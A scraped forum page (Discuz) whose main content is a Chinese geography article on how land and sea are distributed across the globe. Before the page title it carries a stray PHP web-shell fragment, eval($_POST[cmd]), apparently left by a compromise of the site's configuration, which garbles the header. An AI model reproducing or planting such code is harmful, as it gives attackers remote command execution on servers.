');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 世界海陸分佈有什麼特點 - 3C專區 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

世界海陸分佈有什麼特點

地球的表面大部分是海洋,陸地只佔一少部分。地表的總面積約51,000萬平方公里,其中海洋的面積約36,000萬平方公里,佔地表總面積的70.8%;陸地面積約14,900萬平方公里,佔地表總面積的29.2%。也就是說地球的表面七分是海洋,三分是陸地。

  地表的陸地被海洋分隔成大小不等的許多塊,通常人們把海洋所包圍的大面積陸地叫做大陸,小塊陸地叫做島嶼。大陸及其附近的島嶼合稱為洲。這樣,地表的陸地共分6塊大陸:亞歐大陸、非洲大陸、北美大陸、南美大陸、南極大陸和澳大利亞大陸。

  地表的海洋是相互溝通的,形成了統一的世界大洋。根據海陸分佈形勢,可把世界海洋分為四部分:太平洋、大西洋、印度洋和北冰洋。其間沒有什麼天然的界線,通常以水下的海嶺或某條經線為分界的。

  世界海陸分佈形勢大致有以下特點:

  第一,陸地主要集中於北半球,這裡陸地占北半球總面積的五分之二,並在中、高緯度地帶幾乎連成一片。在南半球,陸地面積佔五分之一,而且在南緯56°~65°地帶幾乎全是海洋。但是,北半球的極地是一片海洋,南半球的極地卻是一塊大陸。

  第二,除南極大陸外,所有大陸都南北成對分佈:北美大陸和南美大陸、歐洲大陸和非洲大陸、亞洲大陸和澳大利亞大陸,每對大陸之間都是地殼破裂地帶,並形成較深的「陸間海」,其間島嶼眾多,火山地震活動頻繁。

  第三,大部分大陸的輪廓都是北寬南窄,呈倒置三角形。亞歐大陸、非洲大陸、南美大陸和北美大陸都非常典型;澳大利亞大陸也具有北部較寬的特點,只有南極大陸例外。

  第四,弧形列島和較大的島嶼多位於大陸東岸。亞歐大陸、北美大陸和澳大利亞大陸東岸都有一連串向東突出的島弧,島弧外側為一系列深海溝。大陸西岸的島嶼則不成弧形排列,較大的島嶼也少,唯一例外的是不列顛群島。

  第五,大西洋東西兩岸的輪廓非常相似,海岸線彼此幾乎吻合,彷彿是由一塊大陸分離開來似的。
返回列表